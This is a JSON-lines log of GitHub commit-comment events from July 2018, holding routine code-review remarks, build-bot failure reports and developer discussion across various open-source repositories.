{"id":"8002780030","type":"CommitCommentEvent","actor":{"login":"meta-simran-kapoor"},"repo":{"name":"meta-Niraj-Gupta/GET2018"},"payload":{"comment":{"id":29797898,"position":3,"line":3,"path":"Calculator/CannotSubtractNumber.java","commit_id":"3b513740ab620e40bde8a151929d9da056d018a2","created_at":"2018-07-23T09:37:41Z","updated_at":"2018-07-23T09:37:41Z","author_association":"COLLABORATOR","body":"Class Name can be more appropriate like \"ArithmeticExceptions\""}},"created_at":"2018-07-23T09:37:41Z"}
{"id":"8002781473","type":"CommitCommentEvent","actor":{"login":"ya3344"},"repo":{"name":"ya3344/Algorithm"},"payload":{"comment":{"id":29797903,"position":null,"line":null,"path":null,"commit_id":"852c64b1b96594b0a1e9232d988e538606d9f368","created_at":"2018-07-23T09:37:58Z","updated_at":"2018-07-23T09:37:58Z","author_association":"OWNER","body":"shtht"}},"created_at":"2018-07-23T09:37:58Z"}
{"id":"8002784274","type":"CommitCommentEvent","actor":{"login":"usr007"},"repo":{"name":"usr007/http"},"payload":{"comment":{"id":29797912,"position":null,"line":null,"path":null,"commit_id":"25b5b3f66885bab50c0cf5e2897e9001191df4cb","created_at":"2018-07-23T09:38:30Z","updated_at":"2018-07-23T09:38:30Z","author_association":"OWNER","body":"[https.zip](https://github.com/usr007/http/files/2218769/https.zip)\r\n"}},"created_at":"2018-07-23T09:38:30Z"}
{"id":"8002788923","type":"CommitCommentEvent","actor":{"login":"mclarekin"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":29797916,"position":null,"line":null,"path":null,"commit_id":"c333ee69ab5ca36b4589d0ccd6a7727dc0bc2d21","created_at":"2018-07-23T09:39:25Z","updated_at":"2018-07-23T09:39:25Z","author_association":"COLLABORATOR","body":"well done\r\nin scator imag meant imaginary, but it could have been a mispelling.  I will manually correct to imaginary"}},"created_at":"2018-07-23T09:39:25Z"}
{"id":"8002790517","type":"CommitCommentEvent","actor":{"login":"cokikipla"},"repo":{"name":"cokitech/TestCoki"},"payload":{"comment":{"id":29797919,"position":null,"line":null,"path":null,"commit_id":"76e1abf81690d919c6cfeaf3cac0f4e32070fa81","created_at":"2018-07-23T09:39:43Z","updated_at":"2018-07-23T09:39:43Z","author_association":"NONE","body":"n"}},"created_at":"2018-07-23T09:39:43Z"}
{"id":"8002793053","type":"CommitCommentEvent","actor":{"login":"seb-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29797922,"position":56,"line":56,"path":"addons/base_vat_autocomplete/static/src/js/res_partner_vat_many2one_backend.js","commit_id":"1ded12ae6684386e277663aa9ff4b8eb26fa586e","created_at":"2018-07-23T09:40:14Z","updated_at":"2018-07-23T09:40:14Z","author_association":"NONE","body":"extract this in parent so that it can be overridden better"}},"created_at":"2018-07-23T09:40:14Z"}
{"id":"8002797550","type":"CommitCommentEvent","actor":{"login":"meta-simran-kapoor"},"repo":{"name":"meta-Niraj-Gupta/GET2018"},"payload":{"comment":{"id":29797931,"position":46,"line":40,"path":"Calculator/HexCalc.java","commit_id":"3b513740ab620e40bde8a151929d9da056d018a2","created_at":"2018-07-23T09:41:05Z","updated_at":"2018-07-23T09:41:05Z","author_association":"COLLABORATOR","body":"Error messages should always be informative and understandable by user so that he/she understands what's exactly wrong. Like here it could have been - \"Invalid Input:  Output is a negative number. Please input valid numbers such that you get positive results.\" (can be improvised)"}},"created_at":"2018-07-23T09:41:05Z"}
{"id":"8002798639","type":"CommitCommentEvent","actor":{"login":"curioswitch-role"},"repo":{"name":"curioswitch/curiostack"},"payload":{"comment":{"id":29797933,"position":null,"line":null,"path":null,"commit_id":"76c08ceb94ee39f5ff8a619d8b4ec26844f58f21","created_at":"2018-07-23T09:41:17Z","updated_at":"2018-07-23T09:41:17Z","author_association":"NONE","body":"Build failed. Check the logs and try again.\n\nLogs:\nhttps://console.cloud.google.com/gcr/builds/93d5a9f5-752d-4104-a9f8-8522177192d2?project=153942441948"}},"created_at":"2018-07-23T09:41:17Z"}
{"id":"8002800455","type":"CommitCommentEvent","actor":{"login":"dotlambda"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29797935,"position":null,"line":null,"path":null,"commit_id":"610485faa7f8c043482c4a9c030938ed315557e5","created_at":"2018-07-23T09:41:38Z","updated_at":"2018-07-23T09:41:38Z","author_association":"MEMBER","body":"@FRidh I think this causes `python.pkgs.pytestflakes` to fail to build (found out using `git bisect`):\r\n```\r\nrunning install tests\r\nINTERNALERROR> Traceback (most recent call last):\r\nINTERNALERROR>   File \"/nix/store/jzkbnbhgp6h838rby58ahah9bnidbi47-python3.6-pytest-3.6.2/lib/python3.6/site-packages/_pytest/main.py\", line 174, in wrap_session\r\nINTERNALERROR>     config._do_configure()\r\nINTERNALERROR>   File \"/nix/store/jzkbnbhgp6h838rby58ahah9bnidbi47-python3.6-pytest-3.6.2/lib/python3.6/site-packages/_pytest/config/__init__.py\", line 583, in _do_configure\r\nINTERNALERROR>     self.hook.pytest_configure.call_historic(kwargs=dict(config=self))\r\nINTERNALERROR>   File \"/nix/store/5l06yba5vxl45m5mrv6pgxyg7v1vs79b-python3.6-pluggy-0.6.0/lib/python3.6/site-packages/pluggy/__init__.py\", line 628, in call_historic\r\nINTERNALERROR>     res = self._hookexec(self, self._nonwrappers + self._wrappers, kwargs)\r\nINTERNALERROR>   File \"/nix/store/5l06yba5vxl45m5mrv6pgxyg7v1vs79b-python3.6-pluggy-0.6.0/lib/python3.6/site-packages/pluggy/__init__.py\", line 222, in _hookexec\r\nINTERNALERROR>     return self._inner_hookexec(hook, methods, kwargs)\r\nINTERNALERROR>   File \"/nix/store/5l06yba5vxl45m5mrv6pgxyg7v1vs79b-python3.6-pluggy-0.6.0/lib/python3.6/site-packages/pluggy/__init__.py\", line 216, in <lambda>\r\nINTERNALERROR>     firstresult=hook.spec_opts.get('firstresult'),\r\nINTERNALERROR>   File \"/nix/store/5l06yba5vxl45m5mrv6pgxyg7v1vs79b-python3.6-pluggy-0.6.0/lib/python3.6/site-packages/pluggy/callers.py\", line 201, in _multicall\r\nINTERNALERROR>     return outcome.get_result()\r\nINTERNALERROR>   File \"/nix/store/5l06yba5vxl45m5mrv6pgxyg7v1vs79b-python3.6-pluggy-0.6.0/lib/python3.6/site-packages/pluggy/callers.py\", line 76, in get_result\r\nINTERNALERROR>     raise ex[1].with_traceback(ex[2])\r\nINTERNALERROR>   File \"/nix/store/5l06yba5vxl45m5mrv6pgxyg7v1vs79b-python3.6-pluggy-0.6.0/lib/python3.6/site-packages/pluggy/callers.py\", line 180, in _multicall\r\nINTERNALERROR>     res = hook_impl.function(*args)\r\nINTERNALERROR>   File \"/nix/store/vm12cdmv9xgr97j4cp4h6r23xc222qpf-python3.6-pytest-flakes-3.0.2/lib/python3.6/site-packages/pytest_flakes.py\", line 36, in pytest_configure\r\nINTERNALERROR>     config._flakes = FlakesPlugin(config)\r\nINTERNALERROR>   File \"/nix/store/vm12cdmv9xgr97j4cp4h6r23xc222qpf-python3.6-pytest-flakes-3.0.2/lib/python3.6/site-packages/pytest_flakes.py\", line 44, in __init__\r\nINTERNALERROR>     self.mtimes = config.cache.get(HISTKEY, {})\r\nINTERNALERROR> AttributeError: 'Config' object has no attribute 'cache'\r\nbuilder for '/nix/store/5468r0xibpvx6qddmlbx3ks6pv57hwln-python3.6-pytest-flakes-3.0.2.drv' failed with exit code 3\r\n```"}},"created_at":"2018-07-23T09:41:38Z"}
{"id":"8002806492","type":"CommitCommentEvent","actor":{"login":"jfb8856606"},"repo":{"name":"F-Stack/f-stack"},"payload":{"comment":{"id":29797947,"position":null,"line":null,"path":null,"commit_id":"141f33b513af3fdef3b32f58e3cae7f4e00effa1","created_at":"2018-07-23T09:42:46Z","updated_at":"2018-07-23T09:42:46Z","author_association":"CONTRIBUTOR","body":"#244 "}},"created_at":"2018-07-23T09:42:46Z"}
{"id":"8002807707","type":"CommitCommentEvent","actor":{"login":"NE-SmallTown"},"repo":{"name":"JsAaron/webpack4-vue2-template"},"payload":{"comment":{"id":29797950,"position":null,"line":null,"path":null,"commit_id":"ccb61653c44df207a789dc7ccb28e996544ab189","created_at":"2018-07-23T09:43:00Z","updated_at":"2018-07-23T09:43:00Z","author_association":"NONE","body":"为啥 dist 不 gitignore "}},"created_at":"2018-07-23T09:43:00Z"}
{"id":"8002810022","type":"CommitCommentEvent","actor":{"login":"mig42"},"repo":{"name":"mig42/wcf"},"payload":{"comment":{"id":29797957,"position":5,"line":54,"path":"src/System.Private.ServiceModel/src/System/ServiceModel/Channels/HttpChannelFactory.cs","commit_id":"c931e26671d5df4ee96762c1a9c68989390a3406","created_at":"2018-07-23T09:43:29Z","updated_at":"2018-07-23T09:43:29Z","author_association":"OWNER","body":"Sample commenbt"}},"created_at":"2018-07-23T09:43:29Z"}
{"id":"8002810252","type":"CommitCommentEvent","actor":{"login":"ludivinecp"},"repo":{"name":"OpenSourcePolitics/decidim"},"payload":{"comment":{"id":29797958,"position":2,"line":3,"path":"decidim-budgets/lib/decidim/extends/project_extend.rb","commit_id":"b601871ee74c4860c248c3049a7a9f58c2dea669","created_at":"2018-07-23T09:43:31Z","updated_at":"2018-07-23T09:43:31Z","author_association":"NONE","body":"This method is extended in Barcelona app, but it contains `followers `, not ` get_all_users_with_role` so indeed it should be changed with `followers `"}},"created_at":"2018-07-23T09:43:31Z"}
{"id":"8002814528","type":"CommitCommentEvent","actor":{"login":"jfb8856606"},"repo":{"name":"F-Stack/f-stack"},"payload":{"comment":{"id":29797966,"position":null,"line":null,"path":null,"commit_id":"141f33b513af3fdef3b32f58e3cae7f4e00effa1","created_at":"2018-07-23T09:44:19Z","updated_at":"2018-07-23T09:44:19Z","author_association":"CONTRIBUTOR","body":"#244 "}},"created_at":"2018-07-23T09:44:19Z"}
{"id":"8002816957","type":"CommitCommentEvent","actor":{"login":"mig42"},"repo":{"name":"mig42/wcf"},"payload":{"comment":{"id":29797974,"position":5,"line":54,"path":"src/System.Private.ServiceModel/src/System/ServiceModel/Channels/HttpChannelFactory.cs","commit_id":"c931e26671d5df4ee96762c1a9c68989390a3406","created_at":"2018-07-23T09:44:46Z","updated_at":"2018-07-23T09:44:46Z","author_association":"OWNER","body":"second comment"}},"created_at":"2018-07-23T09:44:46Z"}
{"id":"8002817118","type":"CommitCommentEvent","actor":{"login":"kaste"},"repo":{"name":"SublimeLinter/SublimeLinter-phpcs"},"payload":{"comment":{"id":29797975,"position":null,"line":null,"path":null,"commit_id":"e817cd4935345e25170e3dd45acc5ff4b03cc6fb","created_at":"2018-07-23T09:44:48Z","updated_at":"2018-07-23T09:44:48Z","author_association":"CONTRIBUTOR","body":"Why do break for everyone here? Just setting the default to None would have been way better."}},"created_at":"2018-07-23T09:44:48Z"}
{"id":"8002817884","type":"CommitCommentEvent","actor":{"login":"r12a"},"repo":{"name":"aphillips/charmod-norm"},"payload":{"comment":{"id":29797979,"position":59,"line":1391,"path":"index.html","commit_id":"b359ebb35ebe28ecf8f083702648b5c22ada010f","created_at":"2018-07-23T09:44:56Z","updated_at":"2018-07-23T09:44:56Z","author_association":"NONE","body":"The lead in should probably say \"Case insensitive and no Unicode normalization\", shouldn't it?\r\n\r\n(See also my comment about case insensitive/case folding)"}},"created_at":"2018-07-23T09:44:56Z"}
{"id":"8002818388","type":"CommitCommentEvent","actor":{"login":"SHowie5"},"repo":{"name":"SHowie5/CherwellTest"},"payload":{"comment":{"id":29797980,"position":null,"line":null,"path":null,"commit_id":"1665f4a441f47a511dc859a23916a83c69abfe04","created_at":"2018-07-23T09:45:02Z","updated_at":"2018-07-23T09:45:02Z","author_association":"OWNER","body":"Added README.md"}},"created_at":"2018-07-23T09:45:02Z"}
{"id":"8002818845","type":"CommitCommentEvent","actor":{"login":"jcarpent"},"repo":{"name":"stack-of-tasks/pinocchio"},"payload":{"comment":{"id":29797984,"position":null,"line":null,"path":null,"commit_id":"a0af3a193a867f0e9c6d8305f29e8b88634cd278","created_at":"2018-07-23T09:45:08Z","updated_at":"2018-07-23T09:45:08Z","author_association":"CONTRIBUTOR","body":"I will reintroduce for the tools folder to avoid.\r\nSorry for that!"}},"created_at":"2018-07-23T09:45:08Z"}
{"id":"8002820546","type":"CommitCommentEvent","actor":{"login":"sdroege"},"repo":{"name":"sdroege/gst-plugin-threadshare"},"payload":{"comment":{"id":29797990,"position":50,"line":211,"path":"src/socket.rs","commit_id":"3deb93a2a22f851d4d2f4576c87596cce6e7b936","created_at":"2018-07-23T09:45:27Z","updated_at":"2018-07-23T09:45:27Z","author_association":"OWNER","body":"Keep it as is then, this smells like a `#[derive(Clone)]` bug I saw a while ago"}},"created_at":"2018-07-23T09:45:27Z"}
{"id":"8002822476","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29797992,"position":21,"line":21,"path":"5-10.cpp","commit_id":"9f0fcccc7b00546eab6414e789dc02ee9f95fca1","created_at":"2018-07-23T09:45:50Z","updated_at":"2018-07-23T09:45:50Z","author_association":"COLLABORATOR","body":"4と3を定数化しましょう。(石井)"}},"created_at":"2018-07-23T09:45:50Z"}
{"id":"8002822584","type":"CommitCommentEvent","actor":{"login":"r12a"},"repo":{"name":"aphillips/charmod-norm"},"payload":{"comment":{"id":29797993,"position":60,"line":1392,"path":"index.html","commit_id":"b359ebb35ebe28ecf8f083702648b5c22ada010f","created_at":"2018-07-23T09:45:51Z","updated_at":"2018-07-23T09:45:51Z","author_association":"NONE","body":"Lead in should mention Unicode normalization, i think."}},"created_at":"2018-07-23T09:45:51Z"}
{"id":"8002823708","type":"CommitCommentEvent","actor":{"login":"wbs1995"},"repo":{"name":"wbs1995/Second"},"payload":{"comment":{"id":29797994,"position":3,"line":3,"path":"redme.txt","commit_id":"18ddbfb36d223d8f2e01926b5b9fc1cc14057bc7","created_at":"2018-07-23T09:46:05Z","updated_at":"2018-07-23T09:46:05Z","author_association":"OWNER","body":"嗯嗯"}},"created_at":"2018-07-23T09:46:05Z"}
{"id":"8002831450","type":"CommitCommentEvent","actor":{"login":"PepeAmpere"},"repo":{"name":"spring1944/spring1944"},"payload":{"comment":{"id":29798004,"position":null,"line":null,"path":null,"commit_id":"ece36522fd0f0da480904947d43104d873d4fbaf","created_at":"2018-07-23T09:47:35Z","updated_at":"2018-07-23T09:47:35Z","author_association":"CONTRIBUTOR","body":"Its this in collision with the new UI settings? Investigate that/comment the relation please, if you can."}},"created_at":"2018-07-23T09:47:35Z"}
{"id":"8002831620","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"nss-dev/nss"},"payload":{"comment":{"id":29798005,"position":null,"line":null,"path":null,"commit_id":"804e6ff53969911514384a8aa3ced0bb32b044e7","created_at":"2018-07-23T09:47:37Z","updated_at":"2018-07-23T09:47:37Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\n\nSchema Validation Failed!\nRejecting Schema: https://schemas.taskcluster.net/github/v1/taskcluster-github-config.json#\nErrors:\n  * data should NOT have additional properties: \"scopes\"\n  * data.metadata.source should be string\n\n</details>"}},"created_at":"2018-07-23T09:47:37Z"}
{"id":"8002834625","type":"CommitCommentEvent","actor":{"login":"DomyK"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29798010,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T09:48:12Z","updated_at":"2018-07-23T09:48:12Z","author_association":"NONE","body":"A wonderful project made by an amazing team"}},"created_at":"2018-07-23T09:48:12Z"}
{"id":"8002841569","type":"CommitCommentEvent","actor":{"login":"jbrichau"},"repo":{"name":"pharo-project/pharo"},"payload":{"comment":{"id":29798020,"position":null,"line":null,"path":null,"commit_id":"9e442addff3790af0c78dbc73f1f349de8a4ad03","created_at":"2018-07-23T09:49:33Z","updated_at":"2018-07-23T09:49:33Z","author_association":"NONE","body":"Maybe a more succinct description is:\r\n\r\n```\r\n(ReadWriteStream on: ‘abc’) contents\r\n```\r\nreturns `abc` on Pharo 6 but returns `` on Pharo 7\r\n\r\nI would expect it to return its contents like in Pharo 6"}},"created_at":"2018-07-23T09:49:33Z"}
{"id":"8002842554","type":"CommitCommentEvent","actor":{"login":"bji"},"repo":{"name":"yujitach/MenuMeters"},"payload":{"comment":{"id":29798022,"position":null,"line":null,"path":null,"commit_id":"522e64c37dee5ea0f014b0c5808ee3e58e3597a5","created_at":"2018-07-23T09:49:45Z","updated_at":"2018-07-23T09:49:45Z","author_association":"CONTRIBUTOR","body":"Thank you, actually I have tried the latest version as well as your version right before you merged my change and the behavior is the same.  I think it's actually correct, I was confused because the average graph was showing just 15% usage but this is because I am fully loading one CPU on an 8 thread system.\r\n\r\nActually I think everything is working fine.  But if you have a specific issue, I will be happy to look at it.  Only not right now as it's time for bed :)\r\n"}},"created_at":"2018-07-23T09:49:45Z"}
{"id":"8002844000","type":"CommitCommentEvent","actor":{"login":"r12a"},"repo":{"name":"aphillips/charmod-norm"},"payload":{"comment":{"id":29798025,"position":89,"line":1421,"path":"index.html","commit_id":"b359ebb35ebe28ecf8f083702648b5c22ada010f","created_at":"2018-07-23T09:50:02Z","updated_at":"2018-07-23T09:50:02Z","author_association":"NONE","body":"Is there an optional step to apply NFC normalisation before returning the result?"}},"created_at":"2018-07-23T09:50:02Z"}
{"id":"8002844443","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29798027,"position":19,"line":19,"path":"5-11.cpp","commit_id":"f4460b93249888f3d1daf78d2200002a066ea201","created_at":"2018-07-23T09:50:08Z","updated_at":"2018-07-23T09:50:08Z","author_association":"COLLABORATOR","body":"要素数は定数化しましょう。(石井)"}},"created_at":"2018-07-23T09:50:08Z"}
{"id":"8002849769","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29798046,"position":43,"line":54,"path":"5-11.cpp","commit_id":"e997c0789d5345b995f9069c6615a1df64db07f8","created_at":"2018-07-23T09:51:08Z","updated_at":"2018-07-23T09:51:08Z","author_association":"COLLABORATOR","body":"ループが終わってから1回割り出せば事足りそうです。(石井)"}},"created_at":"2018-07-23T09:51:08Z"}
{"id":"8002850698","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29798048,"position":66,"line":68,"path":"5-11.cpp","commit_id":"e997c0789d5345b995f9069c6615a1df64db07f8","created_at":"2018-07-23T09:51:18Z","updated_at":"2018-07-23T09:51:18Z","author_association":"COLLABORATOR","body":"ループが終わってから1回割り出せば事足りそうです。(石井)"}},"created_at":"2018-07-23T09:51:18Z"}
{"id":"8002852640","type":"CommitCommentEvent","actor":{"login":"redongjun"},"repo":{"name":"sdroege/gst-plugin-threadshare"},"payload":{"comment":{"id":29798054,"position":79,"line":274,"path":"src/socket.rs","commit_id":"3deb93a2a22f851d4d2f4576c87596cce6e7b936","created_at":"2018-07-23T09:51:42Z","updated_at":"2018-07-23T09:51:42Z","author_association":"NONE","body":"I'm really sorry to bother you for not being able to deal with this correctly. \r\n\r\nIn case of TCP, As you explained earlier, I understood that it is not necessary to deal with it here because it is handled at a higher layer. \r\n\r\nHow can I fix it? Can you explain it in more detail?\r\n\r\nI referred to [gstbasesrc](https://github.com/collects/gstreamer/blob/master/libs/gst/base/gstbasesrc.c) and [gsttcpclientsrc](https://github.com/GStreamer/gst-plugins-base/blob/master/gst/tcp/gsttcpclientsrc.c) in this regard but could not get the right way."}},"created_at":"2018-07-23T09:51:42Z"}
{"id":"8002853124","type":"CommitCommentEvent","actor":{"login":"0legKot"},"repo":{"name":"0legKot/Godsend"},"payload":{"comment":{"id":29798057,"position":null,"line":null,"path":null,"commit_id":"02a831d73a1b8c156938b504e32590dd74443132","created_at":"2018-07-23T09:51:47Z","updated_at":"2018-07-23T09:51:47Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add state for product](https://trello.com/c/MXDRvQ9N/94-add-state-for-product)"}},"created_at":"2018-07-23T09:51:47Z"}
{"id":"8002856601","type":"CommitCommentEvent","actor":{"login":"Jojo-Schmitz"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":29798068,"position":null,"line":null,"path":null,"commit_id":"5fb95f8fead593dc541f03cce1e3c3ee309fd12b","created_at":"2018-07-23T09:52:29Z","updated_at":"2018-07-23T09:52:29Z","author_association":"CONTRIBUTOR","body":"And/or extend the local array with HEAD_CUSTOM?"}},"created_at":"2018-07-23T09:52:29Z"}
{"id":"8002859803","type":"CommitCommentEvent","actor":{"login":"bradharding"},"repo":{"name":"bradharding/doomretro"},"payload":{"comment":{"id":29798079,"position":null,"line":null,"path":null,"commit_id":"3430e7d73e6cb3d84aa2b3bd233713f0891e2955","created_at":"2018-07-23T09:53:06Z","updated_at":"2018-07-23T09:53:06Z","author_association":"OWNER","body":"Actually, maybe not... ☹️ "}},"created_at":"2018-07-23T09:53:06Z"}
{"id":"8002861233","type":"CommitCommentEvent","actor":{"login":"t-taylor"},"repo":{"name":"Lexer747/PingPlotter"},"payload":{"comment":{"id":29798083,"position":null,"line":null,"path":null,"commit_id":"e96eb15cc8c4ea833f892751f2f0b93345fa11f9","created_at":"2018-07-23T09:53:23Z","updated_at":"2018-07-23T09:53:23Z","author_association":"NONE","body":"Nice code man! Keep it up :)"}},"created_at":"2018-07-23T09:53:23Z"}
{"id":"8002868674","type":"CommitCommentEvent","actor":{"login":"mp911de"},"repo":{"name":"spring-projects/spring-vault"},"payload":{"comment":{"id":29798095,"position":null,"line":null,"path":null,"commit_id":"814f42afc268b2127cb4bab2e3dc975f94ad52a0","created_at":"2018-07-23T09:54:47Z","updated_at":"2018-07-23T09:54:47Z","author_association":"MEMBER","body":"That's scheduled for 2.1. Expect a GA release later this year, around October."}},"created_at":"2018-07-23T09:54:47Z"}
{"id":"8002874261","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29798101,"position":112,"line":90,"path":"5-11.cpp","commit_id":"e997c0789d5345b995f9069c6615a1df64db07f8","created_at":"2018-07-23T09:55:48Z","updated_at":"2018-07-23T09:55:48Z","author_association":"COLLABORATOR","body":"ここから下の2ステップはこのループ内で処理する必要はなさそうです。(石井)"}},"created_at":"2018-07-23T09:55:48Z"}
{"id":"8002879293","type":"CommitCommentEvent","actor":{"login":"sanguinariojoe"},"repo":{"name":"spring1944/spring1944"},"payload":{"comment":{"id":29798107,"position":null,"line":null,"path":null,"commit_id":"ece36522fd0f0da480904947d43104d873d4fbaf","created_at":"2018-07-23T09:56:41Z","updated_at":"2018-07-23T09:56:41Z","author_association":"MEMBER","body":"I would say it is not colliding with the new UI, not at least further than the previous version of the widget. @PepeAmpere you are in fact the father of the new UI, so you are the expert.\r\n\r\nAnyway, if you really want I take a look, just let me know (double check :-p )"}},"created_at":"2018-07-23T09:56:41Z"}
{"id":"8002880943","type":"CommitCommentEvent","actor":{"login":"seagle0128"},"repo":{"name":"bbatsov/projectile"},"payload":{"comment":{"id":29798113,"position":null,"line":null,"path":null,"commit_id":"b90b950eead64b171d528098d186c19804739aa0","created_at":"2018-07-23T09:57:00Z","updated_at":"2018-07-23T09:57:00Z","author_association":"NONE","body":"What's the purpose of changing \"C-c p\" to \"C-c C-p\"?\r\nIt's conflicted with `wgrep-ag`. I know the workarounds, but don't know the reason."}},"created_at":"2018-07-23T09:57:00Z"}
{"id":"8002881817","type":"CommitCommentEvent","actor":{"login":"RainbowMiner"},"repo":{"name":"RainbowMiner/RainbowMiner"},"payload":{"comment":{"id":29798115,"position":null,"line":null,"path":null,"commit_id":"7249702471d16ee508865d2cd9dac00044056926","created_at":"2018-07-23T09:57:11Z","updated_at":"2018-07-23T09:57:11Z","author_association":"OWNER","body":"#2 "}},"created_at":"2018-07-23T09:57:11Z"}
{"id":"8007052995","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29807382,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-24T00:00:20Z","updated_at":"2018-07-24T00:00:20Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-24T00:00:20Z"}
{"id":"8007054222","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/Cash"},"payload":{"comment":{"id":29807385,"position":49,"line":49,"path":"src/Cash/Main.java","commit_id":"c446f061c32cd1dd79d75b2610954a3e72155270","created_at":"2018-07-24T00:00:44Z","updated_at":"2018-07-24T00:00:44Z","author_association":"COLLABORATOR","body":"Я бы скрыл внутри cash. Потом расскажу о слоистой структуре. "}},"created_at":"2018-07-24T00:00:44Z"}
{"id":"8007057331","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29807397,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-24T00:01:48Z","updated_at":"2018-07-24T00:01:48Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-24T00:01:48Z"}
{"id":"8007058684","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29807405,"position":null,"line":null,"path":null,"commit_id":"9f84b40f0d795eb7b5d7222769c99724ab06a7ee","created_at":"2018-07-24T00:02:18Z","updated_at":"2018-07-24T00:02:18Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/d15-8/10/display/redirect) (on internal Jenkins) failed in stage 'Test run' 🔥 : hudson.AbortException: script returned exit code 2\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/d15-8/10//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/d15-8/9f84b40f0d795eb7b5d7222769c99724ab06a7ee/10/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/d15-8/9f84b40f0d795eb7b5d7222769c99724ab06a7ee/10/jenkins-results/apicomparison/index.html) (no change)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/d15-8/9f84b40f0d795eb7b5d7222769c99724ab06a7ee/10/jenkins-results/generator-diff/index.html) (only version changes)\n🔥 [Test run failed](http://xamarin-storage/jenkins/xamarin-macios/d15-8/9f84b40f0d795eb7b5d7222769c99724ab06a7ee/10/jenkins-results/tests/index.html) 🔥\n\n# Test results\n\n<details>\n<summary>1 tests failed, 0 tests skipped, 224 tests passed.</summary>\n\n## Failed tests\n\n * mscorlib/watchOS - simulator/Debug: Failed\n</details>\n"}},"created_at":"2018-07-24T00:02:18Z"}
{"id":"8007059249","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/Cash"},"payload":{"comment":{"id":29807406,"position":5,"line":5,"path":"src/Cash/Main.java","commit_id":"c446f061c32cd1dd79d75b2610954a3e72155270","created_at":"2018-07-24T00:02:30Z","updated_at":"2018-07-24T00:02:30Z","author_association":"COLLABORATOR","body":"Так не покатит. Не используй статики. Они зло."}},"created_at":"2018-07-24T00:02:30Z"}
{"id":"8007059594","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29807408,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-24T00:02:37Z","updated_at":"2018-07-24T00:02:37Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-24T00:02:37Z"}
{"id":"8007061719","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/Cash"},"payload":{"comment":{"id":29807414,"position":48,"line":48,"path":"src/Cash/Main.java","commit_id":"c446f061c32cd1dd79d75b2610954a3e72155270","created_at":"2018-07-24T00:03:27Z","updated_at":"2018-07-24T00:03:27Z","author_association":"COLLABORATOR","body":"Почему сначала SeatchName потом userName?"}},"created_at":"2018-07-24T00:03:27Z"}
{"id":"8007061956","type":"CommitCommentEvent","actor":{"login":"kwonoh"},"repo":{"name":"kwonoh/pyclustering"},"payload":{"comment":{"id":29807415,"position":null,"line":null,"path":null,"commit_id":"69209e546a78a22fb01236e0d91a532dcbddc002","created_at":"2018-07-24T00:03:32Z","updated_at":"2018-07-24T00:03:32Z","author_association":"OWNER","body":"Hi @annoviko,\r\n\r\nThis parallelization (including my previous commits in this repository) made the computation in c++ much faster. **However, I think the major bottleneck of `kmedoids` is not in the c++ side, but in the python side.**\r\n\r\nIn a simple test (just a single trial) for finding 30 medoids of 10K data points (300-dimension features) using a 8-core machine (16 threads), \r\n\r\nThe function [`kmedoids::process (c++)`](https://github.com/kwonoh/pyclustering/blob/69209e546a78a22fb01236e0d91a532dcbddc002/ccore/src/cluster/kmedoids.cpp#L51) took\r\n- with TBB: 0.545209 sec\r\n- without TBB: 2.68981 sec\r\n\r\nThe function [`kmedoids.__update_medoids (python)`](https://github.com/kwonoh/pyclustering/blob/69209e546a78a22fb01236e0d91a532dcbddc002/pyclustering/cluster/kmedoids.py#L145) took more than 400 secs for both cases."}},"created_at":"2018-07-24T00:03:32Z"}
